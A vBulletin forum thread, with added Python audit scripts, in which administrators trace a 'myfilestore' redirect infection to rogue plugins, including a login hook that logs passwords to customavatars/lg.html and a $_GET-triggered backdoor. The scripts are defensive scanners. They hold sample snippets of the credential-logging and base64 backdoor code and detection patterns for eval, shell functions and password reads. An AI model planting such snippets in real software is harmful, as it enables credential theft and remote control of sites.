Myfilestore.com Virus
Hello, I have a problem with my site www.Madenciyim.com.
Visitors coming from a Google search are being redirected to www.myfilestore.com. When they go back to Google and come in again, they reach my website. What can I do? I deleted the vBSEO plugin. I upgraded my vBulletin on Friday but it is still happening.
Check through your plugins for any new ones that may have been added. I've seen them on the global_complete hook location in the past for myfilestore.
I contacted vB support and they advised me to delete the "ech" files from plugin management. I hope the problem is solved.
Good morning,
Over the weekend I've been getting reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?) Thanks!!
Did you try the suggestion in post #3?
I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical vB4 installation?
Thanks!
The problem is that I inherited these forums from someone else; I don't have a clear sense of which plugins should and shouldn't be in there, nor do I see timestamps on them that would let me pick one out of the lineup because it was recently installed. Certainly I haven't taken any action to install a plugin recently; the only thing I've done is uninstall forumrunner (and delete its folder on the server).
I'm just going to paste the lot and hope someone has insight into one-of-these-things-is-not-like-the-others:

| Product | Plugin | Hook Location |
|---|---|---|
| vBulletin | Federal | ajax_complete |
| vBulletin | Federal | ajax_complete |
| vBulletin | global_rewrite | global_start |
| vBulletin | login_rewrite | login_process |
| Censor Replacements | censor_replacing_script | bbcode_parse_start |
| GlowHost - Spam-O-Matic | Affiliate link placement | parse_templates |
| GlowHost - Spam-O-Matic | Form actions | inlinemod_action_switch |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: Activation Post-Fix | register_activate_process |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: AKISMET SPAM filter | newpost_process |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: Finish Registration | register_addmember_complete |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: First Post/Thread Control | threadfpdata_presave |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: Modify User Quick Links Menu | useradmin_edit_start |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: Registration Pre-Check | register_addmember_process |
| GlowHost - Spam-O-Matic | GlowHost - Spam-O-Matic: Replies Control | postdata_presave |
| GlowHost - Spam-O-Matic | Menu item in Moderation Tools | showthread_start |
| GlowHost - Spam-O-Matic | Stats render | forumhome_complete |
| HS - External Signature Image Size Limiter | HS - External Signature Image Size Limiter | profile_updatesignature_start |
| PostRelease | Cache | cache_templates |
| PostRelease | Template Page | misc_start |
| PostRelease | Thread List Page | forumdisplay_complete |
| Skimlinks Plugin | Add Skimlinks Classes to PostBit | postbit_display_complete |
| Skimlinks Plugin | Add Skimlinks JavaScript to footer template | showthread_complete |
| Skimlinks Plugin | Add Skimlinks Option to Edit Options Form | profile_editoptions_start |
| Skimlinks Plugin | Extend User DataManager | userdata_start |
| Skimlinks Plugin | Update Skimlinks Preference | profile_updateoptions |
| Stop the Registration Bots | Add Member: Check form submit time, hash, and random hidden field. | register_addmember_process |
| Stop the Registration Bots | Reg Check Date: Check for hash and random hidden field passed. Second Step | register_checkdate |
| Stop the Registration Bots | Register Start: Load Functions. First Step. | register_start |
| Yet Another Award System 4.0 | Awards WOL process | online_location_process |
| Yet Another Award System 4.0 | Awards WOL unknown | online_location_unknown |
| Yet Another Award System 4.0 | CSS - Inject CSS into vBulletin | css_start |
| Yet Another Award System 4.0 | YAAS - Add Tab to Navbar | process_templates_complete |
| Yet Another Award System 4.0 | YAAS - Cache Templates | cache_templates |
| Yet Another Award System 4.0 | YAAS - Give Award to User Nav | mod_index_navigation |
| Yet Another Award System 4.0 | YAAS - Member List Display | memberlist_bit |
| Yet Another Award System 4.0 | YAAS - Tab set user | member_start |
| Yet Another Award System 4.0 | YAAS in Member Profile - Init | init_startup |
| Yet Another Award System 4.0 | YAAS in Member Profile - Profile | member_build_blocks_start |
| Yet Another Award System 4.0 | YAAS in Posbit | postbit_display_complete |
| Yet Another Award System 4.0 | YAAS Template Group | template_groups |

Thanks again for your help!
I would focus on these:

Product : vBulletin
- Federal (ajax_complete)
- Federal (ajax_complete)
- global_rewrite (global_start)
- login_rewrite (login_process)

Particularly the last two. Try disabling those two and see what happens.
Thanks, I have done so!
Does that fix the issue? Out of curiosity, would you post the code within those two plugins?
You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log, and look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide)

Problem still exists after all plugins/hooks are disabled? Then it's possible that certain PHP/JS files have been modified on your server.
MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a Google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

    $show['nopasswordempty'] = TRUE;

login_rewrite:

    $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);

The Federal plugins are still on. Here are their codes:

    if(isset($_GET['lol'])){echo

and

    if(isset($_GET['lol'])){echo

In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.
Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html", and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.
I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.
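As an added example (not code from this thread or from vBulletin), the following Python audits rows exported from vBulletin's `plugin` table for the two things MarkFL's post points at: a plugin on a login hook that reads the submitted password and writes it to a file, and a plugin that only does something when a request parameter such as `lol` is present. The sample rows are constructed: the titles and hook names are the ones listed earlier in the thread, but the code bodies are hypothetical, because the thread reproduces the malicious ones only in truncated form. The `customavatars/lg.html` path is the one MarkFL names.

```python
import re

# Indicators to run over the `phpcode` column of vBulletin's `plugin` table
# (the same code the AdminCP Plugin Manager shows). Each entry: (label, regex).
INDICATORS = [
    ("remote-trigger", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")),
    ("eval",           re.compile(r"\b(eval|assert|create_function)\s*\(")),
    ("base64",         re.compile(r"\bbase64_decode\s*\(")),
    ("obfuscation",    re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("file-write",     re.compile(r"\b(file_put_contents|fopen|fwrite|fputs)\s*\(")),
    ("shell",          re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(")),
    ("credentials",    re.compile(r"vb_login_(password|md5password)")),
]

# Hooks at which the submitted login form is still available in $vbulletin->GPC.
# login_process is the one named in the thread; extend from login.php if needed.
LOGIN_HOOKS = {"login_process"}


def audit_plugin(row):
    """Return the indicator labels that fire for one plugin row.

    `row` holds the relevant `plugin` columns: title, hookname, product, phpcode.
    Two derived labels are added on top of the raw matches:
      credential-harvest  login-hook plugin that reads the password AND writes a file
      backdoor            request-parameter gate combined with eval/base64_decode
    """
    code = row["phpcode"]
    hits = [label for label, rx in INDICATORS if rx.search(code)]
    if row["hookname"] in LOGIN_HOOKS and "credentials" in hits and "file-write" in hits:
        hits.append("credential-harvest")
    if "remote-trigger" in hits and ("eval" in hits or "base64" in hits):
        hits.append("backdoor")
    return hits


def audit_plugins(rows):
    """Return [(title, hookname, hits)] for every row that fires at least one indicator."""
    report = []
    for row in rows:
        hits = audit_plugin(row)
        if hits:
            report.append((row["title"], row["hookname"], hits))
    return report


# Constructed sample rows. Titles and hooks mirror the plugin list posted in the
# thread; the code bodies are hypothetical, because the thread shows the malicious
# ones only truncated. The customavatars/lg.html path is the one MarkFL names.
SAMPLE_ROWS = [
    {"product": "vbulletin", "title": "global_rewrite", "hookname": "global_start",
     "phpcode": "$show['nopasswordempty'] = TRUE;"},
    {"product": "vbulletin", "title": "login_rewrite", "hookname": "login_process",
     "phpcode": "$lg_username = strtolower($vbulletin->GPC['vb_login_username']);\n"
                "$lg_password = $vbulletin->GPC['vb_login_password'];\n"
                "file_put_contents(DIR . '/customavatars/lg.html', "
                "$lg_username . ':' . $lg_password . \"\\n\", FILE_APPEND);"},
    {"product": "vbulletin", "title": "Federal", "hookname": "ajax_complete",
     "phpcode": "if(isset($_GET['lol'])){echo base64_decode($_GET['lol']);}"},
    {"product": "glowhost_spamomatic", "title": "Stats render", "hookname": "forumhome_complete",
     "phpcode": "$templater = vB_Template::create('glowhost_stats');\n"
                "$template_hook['forumhome_wgo_pos1'] .= $templater->render();"},
]

if __name__ == "__main__":
    for title, hook, hits in audit_plugins(SAMPLE_ROWS):
        print(f"{title} @ {hook}: {', '.join(hits)}")
```

To run it against a real install, export `SELECT title, hookname, product, phpcode FROM plugin` (with your table prefix, if any) and feed the rows in as dicts. The raw labels are only grep hits; `file_put_contents` on a registration plugin or `$_GET` in an AJAX handler can be legitimate, which is why the two derived labels require a combination of indicators on a hook where that combination makes no honest sense.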
I also could not solve my problem. As vBulletin support told me, I deleted all plugins, and I also deleted the ech files. I only have VSa - Advanced Forum Statistics on my website and it is the latest version. Do I have to delete it?
Can you post exactly what you were told to do?
Hi MarkFL,
Indeed it was harvesting passwords. How awful. I will be backing up and deleting all four plugins. Any idea how these got on our boards in the first place? I am going to be updating from 4.2.0 to 4.2.3 ASAP, but wanted to try to fix this issue before I did...
I would suspect an SQL exploit, and updating to vB 4.2.3 PL2 would be a good idea. :)
Definitely upgrade to the latest version as soon as possible.
It's entirely possible that they modified vBulletin's PHP files as well.
Will the upgrade to 4.2.3 overwrite these possibly-modified PHP files? Other than any possible compromises to security, the other thing I'm interested in is the extensive set of permissions-locked boards that we use; not everything is visible to everyone. As long as those permissions are preserved, I should be good, but if preserving them could allow a hack to persist, maybe not so good...
Yes, the upgrade will overwrite the default vB PHP files, and your permissions should be preserved and shouldn't be involved in any exploit.
Thanks again.
Assuming nothing goes awry, how long should a typical update take to complete?
If I recall correctly, this infection is VERY sneaky because it hides itself if your computer has followed the redirection. I THINK it will only show itself to your computer once per day. If you've seen it and done something that you THINK fixed it, following the infected link a second time will LOOK like it's fixed, because it won't redirect a second time. And tomorrow you might see it again, ONCE.
A full scan of Malwarebytes on your own computer is also a smart thing to consider. https://www.malwarebytes.com/
There is lots of different malware out there that steals your locally saved FTP logins.
- After you deleted all plugins, did you replace all your files with fresh files? Let's say you're running vBulletin 4.2.2. You will need to download a 100% fresh and new copy of the 4.2.2 .zip from https://members.vbulletin.com and ensure you overwrite all files with the new files (to ensure any old hacked files are now replaced AND clean).

Note to everyone else: If you want to upgrade to 4.2.3 after fixing 4.2.2 then that is okay, but always be aware that you should replace all the files with the SAME EXACT version files from a fresh .zip you download from vBulletin.com and FIX the site first, THEN you can upgrade if you wish. DO NOT ASSUME that upgrading will simply fix your hacked site; in super duper rare occasions IF it was a simple file edit then it will, but 99% of the time it's not that simple.
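Overwriting every shipped file with a fresh copy of the same version, as the post above says, fixes tampered files but says nothing about files the archive never contained, such as a dropped PHP file at the web root or a credential log under customavatars. The following Python, an added example that is not this thread's or vBulletin's own code, hashes an installed tree against a pristine extract of the same version and reports what was modified, what was added, and which additions are code or HTML where only data belongs. The two trees it compares are constructed in a temp directory; the file names mirror ones mentioned in this thread, and the list of files expected to differ (includes/config.php) is an assumption to adjust for your install.

```python
import hashlib
import os
import tempfile

# Shipped files that legitimately differ from the release archive and must not be
# overwritten by the fresh upload (assumption: adjust for your install).
EXPECT_DIFFERENT = {"includes/config.php"}

# Upload directories that should hold user data only. Code or HTML appearing in
# them is suspicious (the thread's customavatars/lg.html credential log).
USER_DATA_DIRS = ("customavatars/", "customprofilepics/", "signaturepics/", "attachments/")
UPLOAD_BAD_EXT = (".php", ".phtml", ".php5", ".html", ".htm", ".htaccess")
CODE_EXT = (".php", ".phtml", ".php5")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map relative POSIX-style path -> sha256 for every regular file under root."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return out


def compare_trees(installed_root, clean_root):
    """Compare an installed tree with a pristine extract of the SAME vBulletin version.

    Returns a dict of sorted path lists:
      modified    shipped files whose content differs from the release
      expected    the same, but listed in EXPECT_DIFFERENT (keep these)
      added       files on the server that the release does not contain
      missing     release files absent from the server
      suspicious  added files that are PHP anywhere, or code/HTML inside an upload dir
    """
    installed, clean = hash_tree(installed_root), hash_tree(clean_root)
    changed = [p for p in installed if p in clean and installed[p] != clean[p]]
    added = sorted(p for p in installed if p not in clean)
    return {
        "modified": sorted(p for p in changed if p not in EXPECT_DIFFERENT),
        "expected": sorted(p for p in changed if p in EXPECT_DIFFERENT),
        "added": added,
        "missing": sorted(p for p in clean if p not in installed),
        "suspicious": sorted(
            p for p in added
            if p.lower().endswith(CODE_EXT)
            or (p.startswith(USER_DATA_DIRS) and p.lower().endswith(UPLOAD_BAD_EXT))
        ),
    }


def _write(root, rel, body):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(body)


def build_demo():
    """Build two constructed trees in a temp dir and compare them (sample data only)."""
    tmp = tempfile.mkdtemp()
    clean, site = os.path.join(tmp, "clean"), os.path.join(tmp, "site")
    release = {
        "index.php": "<?php // release index.php\n",
        "includes/class_core.php": "<?php // release class_core.php\n",
        "includes/config.php": "<?php // config.php.new as shipped\n",
        "picture_inlinemod.php": "<?php // legitimate vBulletin file\n",
    }
    for rel, body in release.items():
        _write(clean, rel, body)
        _write(site, rel, body)
    # Deviations on the "server" side (all constructed):
    _write(site, "includes/config.php", "<?php $config['Database']['dbname'] = 'forum';\n")  # legitimate
    _write(site, "index.php", release["index.php"] + "<?php // injected line ?>\n")          # tampered shipped file
    _write(site, "picture_inline.php", "<?php // dropped file, placeholder body\n")           # rogue file named in the thread
    _write(site, "customavatars/lg.html", "user:pass\n")                                     # credential log
    _write(site, "customavatars/avatar42_1.gif", "GIF89a")                                   # ordinary upload
    return compare_trees(site, clean)


if __name__ == "__main__":
    for key, paths in build_demo().items():
        print(f"{key}: {paths}")
```

Point `compare_trees` at the document root and at the `upload/` folder of the release .zip for exactly the version and patch level you are running; a different patch level will list every patched file as modified and bury the real findings. Everything in `modified` and `suspicious` is what the fresh upload must replace or delete; `expected` is what it must not touch.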
Yes, first I deleted plugins and then I upgraded to the latest version. But it did not solve the problem.
Hey guys,

Yeah, Google thinks we're still hacked, probably with the original issue (the occasional browser redirect; that password-logging plugin hasn't reinstalled itself yet, at least). I've been following Google's advice, but curl is no help. Inspecting the front page, there are a few JavaScript codes I don't recognize. One might be Google Analytics? The others, I'm not sure. For your consideration:

    <script async="" src="https://www.google-analytics.com/analytics.js"></script>
    <script type="text/javascript">
    <!--
    if (typeof YAHOO === 'undefined') // Load ALL YUI Local
    {
        document.write('<script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=420"><\/script>');
        document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=420"><\/script>');
        var yuipath = 'clientscript/yui';
        var yuicombopath = '';
        var remoteyui = false;
    }
    else // Load Rest of YUI remotely (where possible)
    {
        var yuipath = 'clientscript/yui';
        var yuicombopath = '';
        var remoteyui = true;
        if (!yuicombopath)
        {
            document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min.js"><\/script>');
        }
    }
    var SESSIONURL = "";
    var SECURITYTOKEN = "guest";
    var IMGDIR_MISC = "images/misc";
    var IMGDIR_BUTTON = "images/buttons";
    var vb_disable_ajax = parseInt("0", 10);
    var SIMPLEVERSION = "420";
    var BBURL = "http://privateerpressforums.com";
    var LOGGEDIN = 0 > 0 ? true : false;
    var THIS_SCRIPT = "index";
    var RELPATH = "forum.php";
    var PATHS = { forum : "", cms : "", blog : "" };
    var AJAXBASEURL = "http://privateerpressforums.com/";
    // -->
    </script>
    <script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=420"></script>
    <style>@media print {#ghostery-purple-box {display:none !important}}</style>
    <script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=420"></script>
    <script type="text/javascript" src="http://privateerpressforums.com/clientscript/vbulletin-core.js?v=420"></script>
    <link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00009l/main-rollup.css?d=1479505047">

Since some of those plugins were hung on 'ajax', this seems promising. Any idea what 'Yui' is? Thanks!

Added later (29 Nov 2016): Also, per Superman's comment: I would very much like to download and rewrite my installation with a fresh copy of my current version (4.2.0, patch 3) before upgrading to 4.2.3, but problematically, only 4.2.0 patch 4 is available for download off the official site. Any suggestions? Thanks!
yui is Yahoo User Interface, if I recall correctly. You can overwrite it with the higher patch version just fine; patches simply overwrite files that had a bug or exploit and, I believe, never require additional installation.
You would be better off just uploading the 4.2.3 files and upgrading.
Per the advice in this thread, I'm going to be deleting all plugins, fixing 4.2.0 and upgrading to 4.2.3 this morning; I am under the impression that a very likely culprit here is Yet Another Awards System, a plugin which, when I googled it, came back heavily associated with "SQL Injection."
It's a bit of a shame, though; apparently we've used YAAS for many years to give badges and whatnot to members of the community. This is a shot in the dark, but does anyone know if those vulnerabilities have been patched by 4.2.3? Is there a good way to similarly overwrite the plugin's files without losing our data on who has what award and so forth?
Only the product developer could fix them.
Hi folks,
My upgrade from 4.2.0 to 4.2.3 seems to have stalled out at the very first step:

    Upgrading to 4.2.3
    Status: Processing 4.2.1 Alpha 1, Step 1 of 6

The "upgrade progress" window is completely blank. It's been this way for about twenty minutes. I know that the whole process may take an hour, or hours, but the lack of any visible progress has me a little spooked. Should I be concerned that it's run out of memory or something? (It advised me before I started that there was a way I could do this from the command line if necessary, but not knowing whether or not it would be necessary, I elected to let the script try to process through the browser control panel as normal.) Is there a way to cancel out, then retry from the command line? Thanks!
Check the error logs of your web server or PHP in order to figure out what is causing it to stop.
The cause could vary: out of memory, the web host blocking you automatically because of too many connections to the server, an SQL error, etc.
Here, I'll save you a whole messload of trouble: log in to your server. Go to your MySQL database (the one for your vBulletin install). Click on search. Type %base64%, click on SELECT ALL, and hit "Go". You will find a large number of base64 codes hidden, most likely within [img] tags from filestore. Remove those. If you have plugins that are using base64, you'd better run a decode and see precisely what they're using it for. (Attachment 155535)
If you look through your files and see picture_inline.php, that file is a shell script installed and is infecting your server/site. (picture_inlinemod.php IS legit.)
Getting those redirects from a Google search to the forum where I help admin; is there an absolute fix for this issue? We have vBulletin 4.2.5.
https://www.vbulletin.com/forum/foru...lestore72-info
https://clients.urljet.com/knowledge...e123-Hack.html
https://clients.urljet.com/knowledge...version-2.html

With filestore they can insert it many different ways; be sure to check for template edits and also rogue plugins (or malicious code added at the bottom of a plugin). I've even seen some take the site into debug mode and add the infection to the Master Style before. Let's hope they didn't do that to you, i.e. possibly some script-kiddie using a tutorial who hasn't a clue about things of this nature other than how to read top-to-bottom and clickity-click-click (lol).
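The phpMyAdmin search for %base64% described a few posts up, and the advice just above to check templates (including the Master Style) and plugins as well, both come down to the same job: pull the text columns, find the base64 runs, decode them, and tell a real inline picture apart from injected script. Here is an added Python example of that, not this thread's or vBulletin's own code. The sample rows are constructed; `TABLE_PREFIX`, the SQL strings and the marker list are assumptions about a default vBulletin 4 schema and about what a filestore-style injection looks like.

```python
import base64
import binascii
import re

# Queries that pull the text columns worth scanning. TABLE_PREFIX is whatever
# $config['Database']['tableprefix'] is in includes/config.php (often empty).
# styleid -1 on the template table is the Master Style.
TABLE_PREFIX = ""
SQL_QUERIES = {
    "post": f"SELECT postid, pagetext FROM {TABLE_PREFIX}post WHERE pagetext LIKE '%base64%'",
    "template": f"SELECT templateid, styleid, title, template FROM {TABLE_PREFIX}template "
                f"WHERE template LIKE '%base64%'",
    "plugin": f"SELECT pluginid, title, hookname, phpcode FROM {TABLE_PREFIX}plugin",
}

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # runs long enough to hide something
PHP_B64 = re.compile(r"base64_decode\s*\(")
BAD_MARKERS = ("<script", "myfilestore", "eval(", "location.href", "window.location",
               "<iframe", "document.write", "<?php")
IMAGE_MAGIC = (b"\x89PNG", b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"RIFF", b"BM")


def try_decode(blob):
    """Decode a candidate base64 run; return bytes, or None if it is not valid base64."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(raw):
    """'image' for real picture bytes (what [img] is for), 'payload' when the decoded
    text carries a known injection marker, otherwise 'unknown' (review by hand)."""
    if raw.startswith(IMAGE_MAGIC):
        return "image"
    text = raw.decode("utf-8", "replace").lower()
    return "payload" if any(m in text for m in BAD_MARKERS) else "unknown"


def scan_row(table, row_id, text):
    """Scan one text column value; return a list of finding dicts."""
    findings = []
    if PHP_B64.search(text):
        findings.append({"table": table, "id": row_id, "kind": "php-base64_decode",
                         "preview": text[:80]})
    for m in B64_BLOB.finditer(text):
        raw = try_decode(m.group(0))
        if raw is None:
            continue
        kind = classify(raw)
        if kind == "image":
            continue
        findings.append({"table": table, "id": row_id, "kind": "base64-" + kind,
                         "preview": raw[:80].decode("utf-8", "replace")})
    return findings


def scan_rows(rows):
    """rows: iterable of (table, row_id, text), e.g. built from SQL_QUERIES results."""
    out = []
    for table, row_id, text in rows:
        out.extend(scan_row(table, row_id, text))
    return out


def _b64(data):
    return base64.b64encode(data if isinstance(data, bytes) else data.encode()).decode()


# Constructed sample rows (not real forum data).
SAMPLE_ROWS = [
    # post 101: a genuine inline PNG, which must NOT be reported
    ("post", 101, "[img]data:image/png;base64," + _b64(b"\x89PNG\r\n\x1a\n" + b"\x00" * 40) + "[/img]"),
    # post 102: a redirect of the kind the thread describes, hidden in an [img] tag
    ("post", 102, "[img]" + _b64("<script>window.location='http://www.myfilestore.com/';</script>") + "[/img]"),
    # template 3001 (styleid -1, Master Style): clean header markup, nothing to report
    ("template", 3001, '<meta http-equiv="Content-Type" content="text/html; charset={vb:raw charset}" />'),
    # plugin 7: decode gated on a request parameter, payload body is a placeholder
    ("plugin", 7, "if(isset($_GET['lol'])){echo base64_decode('"
                  + _b64("if(isset($_GET['lol'])){ /* constructed placeholder */ }") + "');}"),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f['table']}#{f['id']} {f['kind']}: {f['preview']!r}")
```

Treat `base64-payload` as confirmed and `php-base64_decode` in a plugin as something to decode and read in full; `base64-unknown` needs a human, because a 64-character hex digest or a long URL token is also valid base64 and decodes to noise. Templates on styleid -1 are the Master Style the post above warns about; an edit there is inherited by every style, so include them in the rows you feed in.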
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.